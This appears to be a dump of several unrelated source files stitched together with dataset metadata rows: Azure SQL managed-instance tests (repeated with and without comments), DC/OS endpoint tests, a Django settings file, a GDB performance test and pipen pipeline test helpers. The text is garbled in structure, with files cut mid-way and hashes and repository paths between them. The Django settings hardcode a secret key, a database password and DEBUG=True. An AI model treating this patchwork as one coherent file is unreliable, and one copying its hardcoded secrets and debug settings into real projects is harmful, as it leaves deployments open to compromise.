"service_name": "Microsoft.Sql/managedInstances",
"name": "dgManagedInstancexxx"
}
]
}
)
subnet_info = async_subnet_creation.result()
return subnet_info
@recorded_by_proxy
def test_instance_operation(self):
RESOURCE_GROUP = "testManagedInstance"
MANAGED_INSTANCE_NAME = "testinstancexxy"
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/get/List the managed instance management operations[get]
#--------------------------------------------------------------------------
# result = self.client.managed_instance_operations.list_by_managed_instance(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
result = self.client.managed_instance_operations.list()
page_result = [item for item in result]
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/get/Gets the managed instance management operation[get]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instance_operations.get(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, operation_id=OPERATION_ID)
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/post/Cancel the managed instance management operation[post]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instance_operations.cancel(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, operation_id=OPERATION_ID)
@unittest.skip("it will take a long time.")
@ResourceGroupPreparer(location=AZURE_LOCATION)
def test_managed_instances(self, resource_group):
SUBSCRIPTION_ID = self.settings.SUBSCRIPTION_ID
RESOURCE_GROUP = resource_group.name
VIRTUAL_NETWORK_NAME = "myVirtualNetwork"
SUBNET_NAME = "mysubnet"
NETWORK_SECURITY_GROUP = "mynetworksecuritygroup"
ROUTE_TABLE = "myroutetable"
MANAGED_INSTANCE_NAME = "mymanagedinstancexpnvcxxvx"
INSTANCE_POOL_NAME = "myinstancepool"
if self.is_live:
self.create_virtual_network(RESOURCE_GROUP, AZURE_LOCATION, NETWORK_SECURITY_GROUP, ROUTE_TABLE, VIRTUAL_NETWORK_NAME, SUBNET_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/put/Create managed instance with minimal properties[put]
#--------------------------------------------------------------------------
BODY = {
"sku": {
# "name": "BC_Gen5",
# "tier": "GeneralPurpose"
"name": "MIGP8G4",
"tier": "GeneralPurpose",
"family": "Gen5"
},
"location": "westeurope",
"administrator_login": "dummylogin",
"administrator_login_password": "Un53cuRE!",
"subnet_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Network/virtualNetworks/" + VIRTUAL_NETWORK_NAME + "/subnets/" + SUBNET_NAME,
"storage_account_type": "GRS",
# "v_cores": "8",
# "storage_size_in_gb": "128",
# "collection": "Serbian_Cyrillic_100_CS_AS",
# "public_data_endpoint_enabled": True,
# "proxy_override": "Proxy",
# "timezone_id": "Central European Standard Time",
# "minimal_tls_version": "1.2",
# "license_type": "LicenseIncluded"
}
result = self.mgmt_client180601.managed_instances.begin_create_or_update(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, parameters=BODY)
# [Kaihui] it will use 6 hours to complete creation, so comment it.
# result = result.result()
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances by instance pool[get]
#--------------------------------------------------------------------------
result = self.mgmt_client.managed_instances.list_by_instance_pool(resource_group_name=RESOURCE_GROUP, instance_pool_name=INSTANCE_POOL_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/get/Get managed instance[get]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instances.get(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances by resource group[get]
#--------------------------------------------------------------------------
result = self.mgmt_client.managed_instances.list_by_resource_group(resource_group_name=RESOURCE_GROUP)
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances[get]
#--------------------------------------------------------------------------
result = self.mgmt_client.managed_instances.list()
#--------------------------------------------------------------------------
# /ManagedInstances/post/Failover a managed instance.[post]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instances.begin_failover(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, replica_type="Primary")
# result = result.result()
# #--------------------------------------------------------------------------
# # /ManagedInstances/patch/Update managed instance with minimal properties[patch]
# #--------------------------------------------------------------------------
# BODY = {
# "administrator_login": "dummylogin",
# "administrator_login_password": "Un53cuRE!",
# "subnet_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Network/virtualNetworks/" + VIRTUAL_NETWORK_NAME + "/subnets/" + SUBNET_NAME,
# "v_cores": "8",
# "storage_size_in_gb": "128",
# "collection": "Serbian_Cyrillic_100_CS_AS",
# "public_data_endpoint_enabled": True,
# "proxy_override": "Proxy",
# "timezone_id": "Central European Standard Time",
# "minimal_tls_version": "1.2"
# }
# result = self.mgmt_client.managed_instances.begin_update(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, parameters=BODY)
# result = result.result()
#--------------------------------------------------------------------------
# /ManagedInstances/delete/Delete managed instance[delete]
#--------------------------------------------------------------------------
result = self.mgmt_client.managed_instances.begin_delete(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
result = result.result()
| 44.750903
| 200
| 0.53364
|
import unittest
import azure.mgmt.sql
from azure.core.exceptions import HttpResponseError
from devtools_testutils import AzureMgmtRecordedTestCase, RandomNameResourceGroupPreparer, ResourceGroupPreparer, recorded_by_proxy
AZURE_LOCATION = 'eastus'
class MgmtSqlTest(AzureMgmtRecordedTestCase):
def setup_method(self, method):
self.client = self.create_mgmt_client(
azure.mgmt.sql.SqlManagementClient
)
def create_virtual_network(self, group_name, location, security_group_name, route_table_name, network_name, subnet_name):
network_security_group = self.network_client.network_security_groups.begin_create_or_update(
group_name,
security_group_name,
{
"location": location
}
).result()
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"allow_tds_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "1433",
"priority": "1000"
}
).result()
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"allow_redirect_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "11000-11999",
"priority": "1100"
}
).result()
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_inbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4096"
}
).result()
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_outbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Outbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4095"
}
).result()
route_table = self.network_client.route_tables.begin_create_or_update(
group_name,
route_table_name,
{
"location": location
}
).result()
azure_operation_poller = self.network_client.virtual_networks.begin_create_or_update(
group_name,
network_name,
{
'location': location,
'address_space': {
'address_prefixes': ['10.0.0.0/16']
}
},
)
result_create = azure_operation_poller.result()
async_subnet_creation = self.network_client.subnets.begin_create_or_update(
group_name,
network_name,
subnet_name,
{
'address_prefix': '10.0.0.0/24',
'network_security_group': network_security_group,
'route_table': route_table,
'delegations': [
{
"service_name": "Microsoft.Sql/managedInstances",
"name": "dgManagedInstancexxx"
}
]
}
)
subnet_info = async_subnet_creation.result()
return subnet_info
@recorded_by_proxy
def test_instance_operation(self):
RESOURCE_GROUP = "testManagedInstance"
MANAGED_INSTANCE_NAME = "testinstancexxy"
result = self.client.managed_instance_operations.list()
page_result = [item for item in result]
@unittest.skip("it will take a long time.")
@ResourceGroupPreparer(location=AZURE_LOCATION)
def test_managed_instances(self, resource_group):
SUBSCRIPTION_ID = self.settings.SUBSCRIPTION_ID
RESOURCE_GROUP = resource_group.name
VIRTUAL_NETWORK_NAME = "myVirtualNetwork"
SUBNET_NAME = "mysubnet"
NETWORK_SECURITY_GROUP = "mynetworksecuritygroup"
ROUTE_TABLE = "myroutetable"
MANAGED_INSTANCE_NAME = "mymanagedinstancexpnvcxxvx"
INSTANCE_POOL_NAME = "myinstancepool"
if self.is_live:
self.create_virtual_network(RESOURCE_GROUP, AZURE_LOCATION, NETWORK_SECURITY_GROUP, ROUTE_TABLE, VIRTUAL_NETWORK_NAME, SUBNET_NAME)
BODY = {
"sku": {
"name": "MIGP8G4",
"tier": "GeneralPurpose",
"family": "Gen5"
},
"location": "westeurope",
"administrator_login": "dummylogin",
"administrator_login_password": "Un53cuRE!",
"subnet_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Network/virtualNetworks/" + VIRTUAL_NETWORK_NAME + "/subnets/" + SUBNET_NAME,
"storage_account_type": "GRS",
}
result = self.mgmt_client180601.managed_instances.begin_create_or_update(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, parameters=BODY)
result = self.mgmt_client.managed_instances.list_by_instance_pool(resource_group_name=RESOURCE_GROUP, instance_pool_name=INSTANCE_POOL_NAME)
result = self.mgmt_client.managed_instances.list_by_resource_group(resource_group_name=RESOURCE_GROUP)
result = self.mgmt_client.managed_instances.list()
result = self.mgmt_client.managed_instances.begin_delete(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
result = result.result()
| true
| true
|
f707ce44165fb1f567e85f5b11485980daeb77e2
| 4,142
|
py
|
Python
|
packages/dcos-integration-test/extra/test_endpoints.py
|
aaronjwood/dcos
|
b5f75d38e85e26ead42a1c41ec70c7c09591c6c0
|
[
"Apache-2.0"
] | null | null | null |
packages/dcos-integration-test/extra/test_endpoints.py
|
aaronjwood/dcos
|
b5f75d38e85e26ead42a1c41ec70c7c09591c6c0
|
[
"Apache-2.0"
] | null | null | null |
packages/dcos-integration-test/extra/test_endpoints.py
|
aaronjwood/dcos
|
b5f75d38e85e26ead42a1c41ec70c7c09591c6c0
|
[
"Apache-2.0"
] | null | null | null |
import urllib.parse
import bs4
from retrying import retry
def test_if_dcos_ui_is_up(cluster):
r = cluster.get('/')
assert r.status_code == 200
assert len(r.text) > 100
assert 'DC/OS' in r.text
# Not sure if it's really needed, seems a bit of an overkill:
soup = bs4.BeautifulSoup(r.text, "html.parser")
for link in soup.find_all(['link', 'a'], href=True):
if urllib.parse.urlparse(link.attrs['href']).netloc:
# Relative URLs only, others are to complex to handle here
continue
# Some links might start with a dot (e.g. ./img/...). Remove.
href = link.attrs['href'].lstrip('.')
link_response = cluster.head(href)
assert link_response.status_code == 200
def test_if_mesos_is_up(cluster):
r = cluster.get('/mesos')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Mesos</title>' in r.text
def test_if_all_mesos_slaves_have_registered(cluster):
r = cluster.get('/mesos/master/slaves')
assert r.status_code == 200
data = r.json()
slaves_ips = sorted(x['hostname'] for x in data['slaves'])
assert slaves_ips == cluster.all_slaves
def test_if_exhibitor_api_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/list')
assert r.status_code == 200
data = r.json()
assert data["port"] > 0
def test_if_exhibitor_ui_is_up(cluster):
r = cluster.get('/exhibitor')
assert r.status_code == 200
assert 'Exhibitor for ZooKeeper' in r.text
def test_if_zookeeper_cluster_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
data = r.json()
serving_zks = sum(1 for x in data if x['code'] == 3)
zks_ips = sorted(x['hostname'] for x in data)
zks_leaders = sum(1 for x in data if x['isLeader'])
assert zks_ips == cluster.masters
assert serving_zks == len(cluster.masters)
assert zks_leaders == 1
def test_if_uiconfig_is_available(cluster):
r = cluster.get('/dcos-metadata/ui-config.json')
assert r.status_code == 200
assert 'uiConfiguration' in r.json()
def test_if_dcos_history_service_is_up(cluster):
r = cluster.get('/dcos-history-service/ping')
assert r.status_code == 200
assert 'pong' == r.text
def test_if_marathon_ui_is_up(cluster):
r = cluster.get('/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_srouter_service_endpoint_works(cluster):
r = cluster.get('/service/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_mesos_api_is_up(cluster):
r = cluster.get('/mesos_dns/v1/version')
assert r.status_code == 200
data = r.json()
assert data["Service"] == 'Mesos-DNS'
def test_if_pkgpanda_metadata_is_available(cluster):
r = cluster.get('/pkgpanda/active.buildinfo.full.json')
assert r.status_code == 200
data = r.json()
assert 'mesos' in data
assert len(data) > 5 # (prozlach) We can try to put minimal number of pacakages required
def test_if_dcos_history_service_is_getting_data(cluster):
@retry(stop_max_delay=20000, wait_fixed=500)
def check_up():
r = cluster.get('/dcos-history-service/history/last')
assert r.status_code == 200
# Make sure some basic fields are present from state-summary which the DC/OS
# UI relies upon. Their exact content could vary so don't test the value.
json = r.json()
assert {'cluster', 'frameworks', 'slaves', 'hostname'} <= json.keys()
assert len(json["slaves"]) == len(cluster.all_slaves)
check_up()
def test_if_we_have_capabilities(cluster):
"""Indirectly test that Cosmos is up since this call is handled by Cosmos.
"""
r = cluster.get(
'/capabilities',
headers={
'Accept': 'application/vnd.dcos.capabilities+json;charset=utf-8;version=v1'
}
)
assert r.status_code == 200
assert {'name': 'PACKAGE_MANAGEMENT'} in r.json()['capabilities']
| 28.763889
| 93
| 0.666586
|
import urllib.parse
import bs4
from retrying import retry
def test_if_dcos_ui_is_up(cluster):
r = cluster.get('/')
assert r.status_code == 200
assert len(r.text) > 100
assert 'DC/OS' in r.text
soup = bs4.BeautifulSoup(r.text, "html.parser")
for link in soup.find_all(['link', 'a'], href=True):
if urllib.parse.urlparse(link.attrs['href']).netloc:
# Relative URLs only, others are to complex to handle here
continue
# Some links might start with a dot (e.g. ./img/...). Remove.
href = link.attrs['href'].lstrip('.')
link_response = cluster.head(href)
assert link_response.status_code == 200
def test_if_mesos_is_up(cluster):
r = cluster.get('/mesos')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Mesos</title>' in r.text
def test_if_all_mesos_slaves_have_registered(cluster):
r = cluster.get('/mesos/master/slaves')
assert r.status_code == 200
data = r.json()
slaves_ips = sorted(x['hostname'] for x in data['slaves'])
assert slaves_ips == cluster.all_slaves
def test_if_exhibitor_api_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/list')
assert r.status_code == 200
data = r.json()
assert data["port"] > 0
def test_if_exhibitor_ui_is_up(cluster):
r = cluster.get('/exhibitor')
assert r.status_code == 200
assert 'Exhibitor for ZooKeeper' in r.text
def test_if_zookeeper_cluster_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
data = r.json()
serving_zks = sum(1 for x in data if x['code'] == 3)
zks_ips = sorted(x['hostname'] for x in data)
zks_leaders = sum(1 for x in data if x['isLeader'])
assert zks_ips == cluster.masters
assert serving_zks == len(cluster.masters)
assert zks_leaders == 1
def test_if_uiconfig_is_available(cluster):
r = cluster.get('/dcos-metadata/ui-config.json')
assert r.status_code == 200
assert 'uiConfiguration' in r.json()
def test_if_dcos_history_service_is_up(cluster):
r = cluster.get('/dcos-history-service/ping')
assert r.status_code == 200
assert 'pong' == r.text
def test_if_marathon_ui_is_up(cluster):
r = cluster.get('/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_srouter_service_endpoint_works(cluster):
r = cluster.get('/service/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_mesos_api_is_up(cluster):
r = cluster.get('/mesos_dns/v1/version')
assert r.status_code == 200
data = r.json()
assert data["Service"] == 'Mesos-DNS'
def test_if_pkgpanda_metadata_is_available(cluster):
r = cluster.get('/pkgpanda/active.buildinfo.full.json')
assert r.status_code == 200
data = r.json()
assert 'mesos' in data
assert len(data) > 5 # (prozlach) We can try to put minimal number of pacakages required
def test_if_dcos_history_service_is_getting_data(cluster):
@retry(stop_max_delay=20000, wait_fixed=500)
def check_up():
r = cluster.get('/dcos-history-service/history/last')
assert r.status_code == 200
# Make sure some basic fields are present from state-summary which the DC/OS
# UI relies upon. Their exact content could vary so don't test the value.
json = r.json()
assert {'cluster', 'frameworks', 'slaves', 'hostname'} <= json.keys()
assert len(json["slaves"]) == len(cluster.all_slaves)
check_up()
def test_if_we_have_capabilities(cluster):
r = cluster.get(
'/capabilities',
headers={
'Accept': 'application/vnd.dcos.capabilities+json;charset=utf-8;version=v1'
}
)
assert r.status_code == 200
assert {'name': 'PACKAGE_MANAGEMENT'} in r.json()['capabilities']
| true
| true
|
f707d017ac3d245d2a68479e9e3c93fb3bf18ce3
| 3,399
|
py
|
Python
|
mysite/settings.py
|
sssunda/django-board-REST
|
3151491764c8b79227eb537b1ecd4ee321d9d80b
|
[
"MIT"
] | 1
|
2019-06-06T07:56:36.000Z
|
2019-06-06T07:56:36.000Z
|
mysite/settings.py
|
sssunda/django-board-REST
|
3151491764c8b79227eb537b1ecd4ee321d9d80b
|
[
"MIT"
] | null | null | null |
mysite/settings.py
|
sssunda/django-board-REST
|
3151491764c8b79227eb537b1ecd4ee321d9d80b
|
[
"MIT"
] | null | null | null |
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@2%a3gla^-3_x-7fxprr=@o=mafg(ac2%7drm9hbjj02xp&^@9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'board',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'board_rest',
'USER': 'postgres',
'PASSWORD': 'qwerty12345',
'HOST': 'localhost',
'PORT': '' # 비어놓으면 default port로 가게된다.,
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# REST_FRAMEWORK
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 5,
}
| 25.556391
| 91
| 0.68932
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = '@2%a3gla^-3_x-7fxprr=@o=mafg(ac2%7drm9hbjj02xp&^@9'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'board',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'board_rest',
'USER': 'postgres',
'PASSWORD': 'qwerty12345',
'HOST': 'localhost',
'PORT': '' # 비어놓으면 default port로 가게된다.,
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# REST_FRAMEWORK
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 5,
}
| true
| true
|
f707d07c1a26a18889462b824307dc5c95ab19c8
| 1,509
|
py
|
Python
|
contrib/gnu/gdb/dist/gdb/testsuite/gdb.perf/skip-prologue.py
|
TheSledgeHammer/2.11BSD
|
fe61f0b9aaa273783cd027c7b5ec77e95ead2153
|
[
"BSD-3-Clause"
] | 3
|
2021-05-04T17:09:06.000Z
|
2021-10-04T07:19:26.000Z
|
contrib/gnu/gdb/dist/gdb/testsuite/gdb.perf/skip-prologue.py
|
TheSledgeHammer/2.11BSD
|
fe61f0b9aaa273783cd027c7b5ec77e95ead2153
|
[
"BSD-3-Clause"
] | null | null | null |
contrib/gnu/gdb/dist/gdb/testsuite/gdb.perf/skip-prologue.py
|
TheSledgeHammer/2.11BSD
|
fe61f0b9aaa273783cd027c7b5ec77e95ead2153
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (C) 2013-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# This test case is to test the speed of GDB when it is analyzing the
# function prologue.
from perftest import perftest
class SkipPrologue(perftest.TestCaseWithBasicMeasurements):
def __init__(self, count):
super(SkipPrologue, self).__init__("skip-prologue")
self.count = count
def _test(self):
for _ in range(1, self.count):
# Insert breakpoints on function f1 and f2.
bp1 = gdb.Breakpoint("f1")
bp2 = gdb.Breakpoint("f2")
# Remove them.
bp1.delete()
bp2.delete()
def warm_up(self):
self._test()
def execute_test(self):
for i in range(1, 4):
gdb.execute("set code-cache off")
gdb.execute("set code-cache on")
self.measure.measure(self._test, i)
| 35.093023
| 71
| 0.673294
|
from perftest import perftest
class SkipPrologue(perftest.TestCaseWithBasicMeasurements):
def __init__(self, count):
super(SkipPrologue, self).__init__("skip-prologue")
self.count = count
def _test(self):
for _ in range(1, self.count):
bp1 = gdb.Breakpoint("f1")
bp2 = gdb.Breakpoint("f2")
bp1.delete()
bp2.delete()
def warm_up(self):
self._test()
def execute_test(self):
for i in range(1, 4):
gdb.execute("set code-cache off")
gdb.execute("set code-cache on")
self.measure.measure(self._test, i)
| true
| true
|
f707d0bd49a7e0eeabc8b6ddd6261aa57c75d0a8
| 4,679
|
py
|
Python
|
tests/helpers.py
|
sthagen/pwwang-pipen
|
2d32105511222cff2287e985708e80eba56276c7
|
[
"Apache-2.0"
] | 41
|
2017-08-30T10:26:37.000Z
|
2020-10-14T01:37:52.000Z
|
tests/helpers.py
|
sthagen/pwwang-pipen
|
2d32105511222cff2287e985708e80eba56276c7
|
[
"Apache-2.0"
] | 39
|
2017-09-22T18:40:17.000Z
|
2020-11-04T06:49:42.000Z
|
tests/helpers.py
|
sthagen/pwwang-pipen
|
2d32105511222cff2287e985708e80eba56276c7
|
[
"Apache-2.0"
] | 7
|
2018-07-02T05:57:16.000Z
|
2019-12-23T07:43:47.000Z
|
import sys
import signal
from tempfile import gettempdir
from pathlib import Path
from shutil import rmtree
from multiprocessing import Process
import pytest
from pipen import Proc, Pipen, plugin
class SimpleProc(Proc):
"""A very simple process for testing"""
input = ["input"]
class NormalProc(Proc):
"""A normal proc"""
input = "input:var"
output = ["output:{{in.input}}"]
script = "echo {{in.input}}"
class In2Out1Proc(Proc):
"""Process with 2 input vars and 1 output var"""
input = "in1:var, in2:var"
output = "out:var:{{in.in1}}_{{in.in2}}"
script = "echo {{in.in1}} {{in.in2}}"
class RelPathScriptProc(Proc):
"""Process uses relative path script"""
input = "in"
output = "out:var:{{in.in}}"
# use this file itself
script = "file://__init__.py"
class ScriptNotExistsProc(Proc):
"""Process uses relative path script"""
input = "in"
output = "out:var:{{in.in}}"
# use this file itself
script = "file:///no/such/file"
class ErrorProc(Proc):
"""Errant process"""
input = ["input"]
script = "exit 1"
class ScriptRenderErrorProc(Proc):
"""When script is failed to render"""
input = "a"
output = "b:var:1"
script = "{{c(d)}}"
class SleepingProc(Proc):
"""Process to sleep for a certain time"""
input = "time"
script = "sleep {{in.time}}"
class RetryProc(ErrorProc):
input = "starttime"
error_strategy = "retry"
num_retries = 10
lang = sys.executable # python
script = "import sys, time; sys.exit(1 if time.time() < {{in.starttime}} + 3 else 0)"
class OutputRenderErrorProc(Proc):
"""When output is failed to render"""
input = "a"
output = "b:var:{{c(d)}}"
class OutputNoNameErrorProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b"
class OutputWrongTypeProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b:c:d"
class OutputAbsPathProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b:file:/a/b"
class NoInputProc(Proc):
"""Process without input"""
class InputTypeUnsupportedProc(Proc):
"""Input type not supported"""
input = "input:unsupported:1"
class FileInputProc(Proc):
"""Process with file input"""
input = "in:file"
output = "out:file:{{in.in.split('/')[-1]}}"
script = "cat {{in.in}} > {{out.out}}"
class OutputNotGeneratedProc(Proc):
"""Process with output file not generated intentionally"""
input = "in"
output = "out:file:{{in.in}}"
script = "echo {{in.in}}"
class FileInputsProc(Proc):
"""Process with files input"""
input = "in:files"
output = "out:file:{{in.in[0].split('/')[-1]}}"
script = "echo {{in.in}} > {{out.out}}"
class MixedInputProc(Proc):
"""Process with mixed types of input"""
input = "invar:var, infile:file"
output = "outfile:file:{{in.invar}}"
script = "echo {{in.invar}} > {{out.outfile}}"
class DirOutputProc(Proc):
"""Process with directory output"""
input = "in"
output = "outfile:dir:outdir"
script = "echo {{in.in}} > {{out.outfile}}/outfile; "
class SimplePlugin:
@plugin.impl
async def on_init(pipen):
print("SimplePlugin")
@pytest.fixture
def pipen(tmp_path):
"""Get a simple Pipen object each time"""
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def pipen_with_plugin(tmp_path):
"""Get a simple Pipen object each time"""
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
plugins=[SimplePlugin()],
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def infile(tmp_path):
out = tmp_path / "infile"
out.write_text("in")
return out
@pytest.fixture
def infile1(tmp_path):
out = tmp_path / "infile1"
out.write_text("in1")
return out
